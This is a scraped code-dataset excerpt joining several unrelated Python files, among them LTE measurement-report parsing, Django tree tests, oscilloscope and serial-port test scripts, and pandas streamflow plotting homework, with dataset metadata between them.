_item_sub_dict['LteNcPci']})\n _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update({'id': item_id+'-'+item_element.attrib['MR.objectId']})\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def _filter_by_neighbor_len(self, length):\n return list(filter(lambda x: True if len(x['NeighborList'])==length else False, self.item_dicts))\n\n def _map_neighbor_rsrp_diff(self, index):\n measureList=self._filter_by_neighbor_len(index)\n if len(measureList)==0:\n return []\n return list(map(lambda item: {\n 'CellId': item['id'],\n 'NeighborPci': item['NeighborList'][index-1]['Pci'],\n 'RsrpDiff': item['Rsrp']-item['NeighborList'][index-1]['Rsrp'],\n 'Rsrp': item['Rsrp'],\n 'Pci': item['Pci'],\n 'Ta': item['Ta'],\n 'SinrUl': item['SinrUl']\n }, measureList))\n\n def map_rsrp_diff(self):\n diff_list=list(map(lambda index: self._map_neighbor_rsrp_diff(index+1), list(range(6))))\n combined_list=reduce(lambda first,second: first+second,diff_list,[])\n if len(combined_list)==0:\n return []\n stat_list=list(map(lambda item: {\n 'CellId': item['CellId'],\n 'NeighborPci': item['NeighborPci'],\n 'Pci': item['Pci'],\n 'Diff0': 1 if item['RsrpDiff']<=0 else 0,\n 'Diff3': 1 if item['RsrpDiff']<=3 and item['RsrpDiff']>0 else 0,\n 'Diff6': 1 if item['RsrpDiff']<=6 and item['RsrpDiff']>3 else 0,\n 'Diff9': 1 if item['RsrpDiff']<=9 and item['RsrpDiff']>6 else 0,\n 'Diff12': 1 if item['RsrpDiff']<=12 and item['RsrpDiff']>9 else 0,\n 'DiffLarge': 1 if item['RsrpDiff']>12 else 0,\n 'RsrpBelow120': 1 if item['Rsrp']<20 else 0,\n 'RsrpBetween120110': 1 if item['Rsrp']<30 and item['Rsrp']>=20 else 0,\n 'RsrpBetween110105': 1 if item['Rsrp']<35 and item['Rsrp']>=30 else 0,\n 'RsrpBetween105100': 1 if item['Rsrp']<40 and item['Rsrp']>=35 else 0,\n 'RsrpBetween10090': 1 if item['Rsrp']<50 and item['Rsrp']>=40 else 0,\n 'RsrpAbove90': 1 if item['Rsrp']>=50 else 0,\n 'Ta0or1': 1 if item['Ta']==0 or item['Ta']==1 else 0,\n 'Ta2or3': 1 if item['Ta']==2 or item['Ta']==3 else 0,\n 'Ta4or5': 1 if item['Ta']==4 or item['Ta']==5 else 0,\n 'Ta6or7': 1 if item['Ta']==6 or item['Ta']==7 else 0,\n 'Ta8or9': 1 if item['Ta']==8 or item['Ta']==9 else 0,\n 'Ta10to12': 1 if item['Ta']>=10 and item['Ta']<=12 else 0,\n 'Ta13to15': 1 if item['Ta']>=13 and item['Ta']<=15 else 0,\n 'Ta16to19': 1 if item['Ta']>=16 and item['Ta']<=19 else 0,\n 'Ta20to24': 1 if item['Ta']>=20 and item['Ta']<=24 else 0,\n 'Ta25to29': 1 if item['Ta']>=25 and item['Ta']<=29 else 0,\n 'Ta30to39': 1 if item['Ta']>=30 and item['Ta']<=39 else 0,\n 'TaAbove40': 1 if item['Ta']>=40 else 0,\n 'SinrUl0to9': 1 if item['SinrUl']>=0 and item['SinrUl']<=9 else 0,\n 'SinrUl10to19': 1 if item['SinrUl']>=10 and item['SinrUl']<=19 else 0,\n 'SinrUl20to24': 1 if item['SinrUl']>=20 and item['SinrUl']<=24 else 0,\n 'SinrUl25to29': 1 if item['SinrUl']>=25 and item['SinrUl']<=29 else 0,\n 'SinrUl30to34': 1 if item['SinrUl']>=30 and item['SinrUl']<=34 else 0,\n 'SinrUlAbove35': 1 if item['SinrUl']>=35 else 0\n }, combined_list))\n df = DataFrame(stat_list)\n stat=df.groupby(['CellId','Pci','NeighborPci']).sum().reset_index()\n return json.loads(stat.T.to_json()).values()\n\nclass MrsReader:\n def __init__(self, mrNames, startTime, date_dir, db, **kwargs):\n self.mrNames=mrNames\n self.startTime=startTime\n self.date_dir=date_dir\n self.db=db\n return super().__init__(**kwargs)\n\n def read(self, item_measurement):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': item_element.attrib['id']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)\n\n def read_zte(self, item_measurement, eNodebId):\n mrName=item_measurement.attrib['mrName'].replace('MR.','')\n if mrName in self.mrNames:\n item_dicts=[]\n for item_element in item_measurement.iterchildren():\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').replace('.','_').split(' ')\n else:\n item_dict={}\n item_dict.update({'CellId': eNodebId+'-'+item_element.attrib['MR.objectId']})\n item_value = item_element[0].text.split(' ')\n item_dict.update(dict(zip(item_key, map(int, item_value))))\n item_dict.update({'StartTime': self.startTime})\n item_dicts.append(item_dict)\n if len(item_dicts)>0:\n self.db['mrs_'+mrName+'_'+self.date_dir].insert_many(item_dicts)", "sub_path": "Lte.Auxilary/mr/mr_service.py", "file_name": "mr_service.py", "file_ext": "py", "file_size_in_byte": 9319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "functools.reduce", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "96215502", "text": "import re\nimport json\nimport pprint\n\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.test.client import Client\n\nfrom assessment.tests import build_assessments_for_permissions_testing\nfrom utils.helper import HAWCDjangoJSONEncoder\n\nfrom .models import SummaryText\n\nclass SummaryTextTests(TestCase):\n def setUp(self):\n build_assessments_for_permissions_testing(self)\n\n @staticmethod\n def clean_json(json_dump):\n remove_fields = ['created', 'last_updated', 'slug', 'text', 'assessment']\n for node in json_dump:\n node.pop('id')\n for field in remove_fields:\n node['data'].pop(field)\n if node.get('children'):\n SummaryTextTests.clean_json(node['children'])\n\n\n def test_adding_texts(self):\n lvl_1a = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1a',\n slug='lvl_1a',\n text='text')\n\n lvl_1b = SummaryText.add_summarytext(assessment=self.assessment_working,\n title='lvl_1b',\n slug='lvl_1b',\n text='text')\n\n lvl_2a = SummaryText.add_summarytext(assessment=self.assessment_working,\n parent=[lvl_1a],\n title='lvl_2a',\n slug='lvl_2a',\n text='text')\n\n lvl_2b = SummaryText.add_summarytext(assessment=self.assessment_working,\n sibling=[lvl_2a],\n title='lvl_2b',\n slug='lvl_2b',\n text='text')\n\n assessment_root = SummaryText.get_assessment_root_node(self.assessment_working)\n\n tree_form = SummaryText.dump_bulk(assessment_root)\n # print pprint.pprint(tree_form)\n\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n\n # Swap 2a and 2b\n lvl_2b.move_summarytext(parent=lvl_1a, sibling=None)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2b\"}}, {\"data\": {\"title\": \"lvl_2a\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n # Swap back\n lvl_2b.move_summarytext(parent=None, sibling=lvl_2a)\n tree_form = SummaryText.dump_bulk(assessment_root)\n SummaryTextTests.clean_json(tree_form)\n self.assertEqual(json.dumps(tree_form),\"\"\"[{\"data\": {\"title\": \"assessment-1\"}, \"children\": [{\"data\": {\"title\": \"lvl_1a\"}, \"children\": [{\"data\": {\"title\": \"lvl_2a\"}}, {\"data\": {\"title\": \"lvl_2b\"}}]}, {\"data\": {\"title\": \"lvl_1b\"}}]}]\"\"\")\n\n", "sub_path": "project/summary/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 14, "usage_type": "name"}, {"api_name": "assessment.tests.build_assessments_for_permissions_testing", "line_number": 16, "usage_type": "call"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 30, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 30, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 35, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 35, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 40, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 40, "usage_type": "name"}, {"api_name": "models.SummaryText.add_summarytext", "line_number": 46, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 46, "usage_type": "name"}, {"api_name": "models.SummaryText.get_assessment_root_node", "line_number": 52, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 52, "usage_type": "name"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 54, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 54, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 63, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 63, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "models.SummaryText.dump_bulk", "line_number": 69, "usage_type": "call"}, {"api_name": "models.SummaryText", "line_number": 69, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "613704701", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 22 18:33:47 2019\n\n@author: user\n\"\"\"\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt #for displaying data\nfrom mpl_toolkits.mplot3d import Axes3D\nimport csv\nimport pandas as pd #to manage dataframe\nimport struct\nfrom math import sqrt\nimport os # file and path operrations\nimport time\nimport sys # get input arguments of the python program\n\n\n\nimport plotly\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.offline.offline import _plot_html\n\nimport glob #listing of files\nimport json\n\ndata_path = r\"../out/*/\"\noutput_path = r\"../temp/\"\npng_resolution_dpi = 300\n\n\ndirectories = glob.glob(data_path)\nic_cycle_order = []\n\n\nsorted_directories = sorted(directories)#sorted( directories, key = lambda directory: os.path.getctime(directory)) #getmtime for modified time\nprint(sorted_directories)\n# # for directory in sorted_directories:\n # # print(directory+'\\n')#print(\"{} - {}\".format(directory, time.ctime(os.path.getctime(directory))) )\n\nchannel = int(sys.argv[1]) \nprint('channel = \\n', channel);\nic_cycle = int(sys.argv[2]) \nprint('ic_cycle = \\n', ic_cycle);\nwb_cycle = int(sys.argv[3])\nprint('wb_cycle = \\n', wb_cycle);\nwb_sub_cycle = int(sys.argv[4])\nprint('wb_sub_cycle = \\n', wb_sub_cycle);\n\ntotal_ic_cycles = len(directories) # may add additional checks to avoid parasite folders added for testing\n# may also check json file to get metadata\n# manage the cases where user inputs exceed the limits ic and wb\n# total_wb_cycles = #get this from json file\n\n\n\nif ic_cycle > (total_ic_cycles - 1) :\n\tic_cycle = total_ic_cycles - 1 # this is to display the last data\n\n# confirm the data exist\n\nstream_filename = sorted_directories[ic_cycle] + \"ch_\" + str(channel) + \"_raw.dat\"\nprint(stream_filename);\n\nresult = sorted_directories[ic_cycle].find('IC_CYCLE') \nif result == -1:\n\tprint('Folder name incorrect \\n')\n\tsys.exit()\n\n\t\nwith open(sorted_directories[ic_cycle]+'cfg.json') as json_file: \n\tdata = json.load(json_file)\n\tsampling_period_ns = data['Oscilloscopes']['Picoscope 4444']['Sampling Period NS']\n\tresolution_bits = data['Oscilloscopes']['Picoscope 4444']['Sample Resolution bits']\n\tvoltage_range_str = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Voltage Range']\n\ttotal_samples_per_waveform = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveform Number of Samples']\t\n\twaveforms_per_wb_cycle = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms per WB Cycle']\t\n\t\n\trange_val, range_unit = voltage_range_str.split()\n\trange_val_mv = 0\n\tif range_unit == 'V':\n\t\trange_val_mv = 1000 * int(range_val)\n\telse:\n\t\trange_val_mv = int(range_val)\n\tprint ('range_mv =', range_val_mv)\t\t\t\n\t\n\t\nwith open(sorted_directories[ic_cycle]+'stat.json') as json_file: \n\tdata = json.load(json_file)\n\tcaptured_waveforms = data['Oscilloscopes']['Picoscope 4444']['Channels']['Channel '+str(channel)]['Waveforms found']\n\t\n\n\n\n# get the following data from json\nwb_cycle_total_samples = waveforms_per_wb_cycle * total_samples_per_waveform\ni = 0\nsample_offset = wb_cycle * wb_cycle_total_samples + wb_sub_cycle * total_samples_per_waveform\n\n\n\n\t\n\nexists = os.path.isfile(stream_filename)\nif exists:\n\t# Store configuration file values\n\ttest = 0\nelse:\n\t# Keep presets\n\tprint('ch1 file doesn t exist \\n')\n\tsys.exit()\n\nfp_stream = open(stream_filename, \"rb\")\nfp_stream.seek(sample_offset * 2)\nstream1 = np.fromfile(fp_stream, dtype=([('channel', 'maxADCValue;\ndata = np.float64(stream1['channel'])\ndata = data * range_val_mv / 32768\n\n\n\n\n# # Create a trace\ntrace = go.Scatter(\n y = stream1['channel']\n)\nlayout = go.Layout(\n margin=dict(\n l=0,\n r=0,\n b=0,\n t=0,\n\t\tpad=4\n ),\n paper_bgcolor='#7f7f7f',\n plot_bgcolor='#c7c7c7'\t\n)\nfig = plt.figure()\nfig = go.Figure(data=[trace], layout=layout)\nplotly.offline.plot(fig, filename= output_path + 'ch_' + str(channel) + \".html\", auto_open=False)\n\n\n", "sub_path": "prg/picoscope_4444/python/process_raw_html.py", "file_name": "process_raw_html.py", "file_ext": "py", "file_size_in_byte": 4168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "glob.glob", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "json.load", "line_number": 74, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.fromfile", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 121, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 128, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 128, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 131, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Figure", "line_number": 143, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 143, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 144, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 144, "usage_type": "attribute"}]} +{"seq_id": "96900209", "text": "import logging\nimport serial\nimport time\n\n###################################################################################\n\n\nclass CommUART(object):\n def __init__(self, address):\n self.address = address\n self.sc = None\n\n def connect(self):\n logging.debug(\"Opening COM port : {0}\".format(self.address))\n self.sc = None\n while self.sc is None:\n try:\n self.sc = serial.Serial(port=self.address, baudrate=3000000, rtscts=False)\n except serial.serialutil.SerialException as se:\n if 'Device or resource busy:' in se.__str__():\n logging.info('Opening COM port is taking a little while, please stand by...')\n else:\n logging.error('se: {0}'.format(se))\n time.sleep(1)\n logging.debug(\"COM port open successfully.\")\n self.sc.flushInput()\n\n def disconnect(self):\n logging.debug(\"Closing COM port : {0}\".format(self.address))\n self.sc.close()\n\n def receivedPacket(self, length):\n if self.sc is None:\n raise Exception('COM port is not opened.')\n packet = b''\n received = 0\n while received < length:\n serialByte = self.sc.read(1)\n if serialByte is None:\n raise Exception('Bad character.')\n elif len(serialByte) == 0:\n break\n elif received < length:\n received += 1\n packet += serialByte\n return packet\n \n def send(self, data):\n self.sc.write(bytes([data]))\n\n def prbs8(self, curval):\n newbit = (((curval >> 6) ^ (curval >> 5)) & 1)\n return ((curval << 1) | newbit) & 0x7f\n###################################################################################\n\ndef main():\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s : %(message)s')\n\n #comm = CommUART(\"/dev/cu.usbserial-FT0NCE8B\")\n #comm = CommUART(\"/dev/cu.usbmodem143422\")\n comm = CommUART(\"/dev/cu.usbmodem143132\")\n comm.connect()\n\n curval = 0\n #packet = comm.receivedPacket(1)\n #curval = int.from_bytes(packet, byteorder = 'little')\n val = comm.prbs8(0xff)\n byteCount = 0\n dropcnt = 0\n deltatime = 0\n drop = False\n while True:\n try:\n comm.send(val)\n startTime = time.time()\n# packet = comm1.receivedPacket(1)\n endTime = time.time()\n deltatime += endTime - startTime\n # curval = int.from_bytes(packet, byteorder = 'little')\n # if curval != val:\n # dropcnt += 1\n val = comm.prbs8(val)\n byteCount += 1\n\n if deltatime > 0:\n bytesPerSec = byteCount / deltatime #(endTime - startTime)\n\n #print(\"Bytes : {0}\".format(bytes))\n #if drop:\n # print(\"Dropped.... Bytes/sec : {0}\".format(bytesPerSec))\n #else:\n if (byteCount & 0xff) == 0:\n print(\"Bytes/sec : %.2f, drop %d \" %(bytesPerSec, dropcnt))\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt. Exiting.\")\n break\n\n comm.disconnect()\n # comm1.disconnect()\n###################################################################################\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "Python/uartprbs_tx.py", "file_name": "uartprbs_tx.py", "file_ext": "py", "file_size_in_byte": 3348, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.debug", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 18, "usage_type": "call"}, {"api_name": "serial.serialutil", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 57, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "533072377", "text": "import matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport matplotlib.ticker as ticker\r\n\r\n# result_file = \"../expt/results/task4_1.txt\"\r\nresult_file = \"finalT2.txt\"#\"outputDataT2.txt\"\r\ninstance_list = [\"../instances/i-1.txt\",\"../instances/i-2.txt\",\"../instances/i-3.txt\"]\r\n# instance_list = [\"i-1.txt\",\"i-2.txt\",\"i-3.txt\"]\r\nalgorithms = [\"thompson-sampling\", \"thompson-sampling\"]\r\nfinal_dict = {\"../instances/i-1.txt\":{}, \"../instances/i-2.txt\":{}, \"../instances/i-3.txt\":{}}\r\nhorizons = [100, 400, 1600, 6400, 25600, 102400]\r\n# final_dict = {\"i-3.txt\":{}, \"i-1.txt\":{}, \"i-2.txt\":{}}\r\nwith open(result_file,'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n x = line.rstrip().split(', ')\r\n if x[1] in final_dict[x[0]].keys():\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n else:\r\n final_dict[x[0]][x[1]] = [0]*6\r\n final_dict[x[0]][x[1]][int(np.log2(int(x[4])/100)/2)] += float(x[5])/50.0\r\n\r\nfor i,instance in enumerate(instance_list):\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.set_xscale('log')\r\n ax.xaxis.set_ticks(horizons)\r\n ax.get_xaxis().set_major_formatter(ticker.ScalarFormatter())\r\n ts = final_dict[instance][\"thompson-sampling\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling\")\r\n ts = final_dict[instance][\"thompson-sampling-with-hint\"]\r\n plt.plot(horizons,ts,label=\"Thompson-Sampling (with Hint)\")\r\n plt.xlabel(\"Horizon (Logarithmic Scale, Base 2)\")\r\n plt.ylabel(\"Average Regret\")\r\n plt.legend()\r\n\r\n pltTitle = instance.replace('../instances/', '')\r\n pltTitle = pltTitle.replace('.txt', '')\r\n pltTitle = pltTitle.replace('i-', 'Instance ')\r\n # plt.plot(x_axis,kl_ucb,x_axis,ts,x_axis,ucb,x_axis,eg)\r\n plt.title(\"{}\".format(pltTitle))\r\n plt.savefig(\"testT2_instance{}.png\".format(i+1))", "sub_path": "Assignment1/submission/PlotGenT2.py", "file_name": "PlotGenT2.py", "file_ext": "py", "file_size_in_byte": 1863, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log2", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "8280225", "text": "# Example solution for HW 4\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week5.txt'\nfilepath = os.path.join('data', filename)\nprint(os.getcwd())\nprint(filepath)\n\n# filepath = '../Assignments/Solutions/data/streamflow_week1.txt'\n\n# %%\n#Read the data into a pandas dataframe\ndata=pd.read_table(filepath, sep = '\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] =data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# %%\n# Sorry no more helpers past here this week, you are on your own now :) \n# Hints - you will need the functions: describe, info, groupby, sort, head and tail.\n#%%\n# Esimation5\ndata.flow\n# print(data.datetime[(data.flow >= rnge[0]) & (data.flow <= rnge[1])])\n\n# list_2010 = []\n# list_2011 = []\n# list_2012 = []\n# list_2013 = []\n# list_2014 = []\n# list_2015 = []\n# list_2016 = []\n# list_2017 = []\n# list_2016 = []\n# list_2017 = []\n# list_2020 = []\n\n# data.flow[(data.year >= 2010) & (data.year <= 2020) & (data.month == i)].mean]\n#%%\n# 1, 3, 5, 7, 8, 10, 12\nfor d in range(2010, 2020):\n fig1 = plt.figure()\n fig1.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (1, 3, 5, 7, 8, 10, 12):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in month')\n plt.legend(['1', '3', '5', '7', '8', '10', '12'])\n plt.savefig('graphs/flow-set1_%d'%(d))\n\n \n# x = list(range(1, 32))\n# print(x)\n\n\n# print(flow_data.size)\n# print(flow_data.shape)\n# flow_202009 = flow_data[11571:11585, 3]\n# print(flow_202009)\n\n# x = [6.,7,8,9,10,11,12,13,14,15,16,17,18,19]\n# fig9 = plt.figure()\n# fig9.patch.set_facecolor('xkcd:mint green')\n# plt.plot(x, flow_202009)\n# plt.xlabel('days in September 2020')\n# plt.ylabel('flow')\n# plt.legend()\n# plt.savefig('graphs/flow_202009')\n\n# %%\n# 4, 6, 9, 11\nfor d in range(2010, 2020):\n fig2 = plt.figure()\n fig2.patch.set_facecolor('xkcd:mint green')\n plt.title('%d'%(d))\n plt.ylabel('flow')\n for i in (4, 6, 9, 11):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == d) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6', '9', '11'])\n plt.savefig('graphs/flow-set2_%d'%(d))\n# %%\n# 2020\n\nfig3 = plt.figure()\nfig3.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (1, 3, 5, 7, 8):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 32))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['1', '3', '5', '7', '8'])\n plt.savefig('graphs/flow-set3_2020-%i'%(i))\n\ndata.flow[(data.year == 2020) & (data.month == 1)]\n\nfig4 = plt.figure()\nfig4.patch.set_facecolor('xkcd:mint green')\nplt.title('2020')\nplt.ylabel('flow')\nfor i in (4, 6):\n # print(i)\n # print(data.flow[(data.year == 2010) & (data.month == i)].mean)\n # print(\"\\n\")\n # data.flow[(data.year == 2010) & (data.month == i)]\n x = list(range(1, 31))\n # print(x)\n plt.plot(x, (data.flow[(data.year == 2020) & (data.month == i)]))\n plt.xlabel('days in the month')\n plt.legend(['4', '6'])\n plt.savefig('graphs/flow-set4_2020-%i'%(i))\n# %%\n# When September Ends\nx = list(range(1, 27))\nfig5 = plt.figure()\nfig5.patch.set_facecolor('xkcd:mint green')\nplt.title('2020-9')\nplt.ylabel('flow')\nplt.plot(x, (data.flow[(data.year == 2020) & (data.month == 9)]))\nplt.xlabel('days in the month')\nplt.legend([])\nplt.savefig('graphs/flow-set5_2020-9')\n\nprint((data.flow[(data.year == 2020) & (data.month == 9)]))\n# %%\n", "sub_path": "assignment_5/week5_pandas_starter_BM.py", "file_name": "week5_pandas_starter_BM.py", "file_ext": "py", "file_size_in_byte": 4760, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": 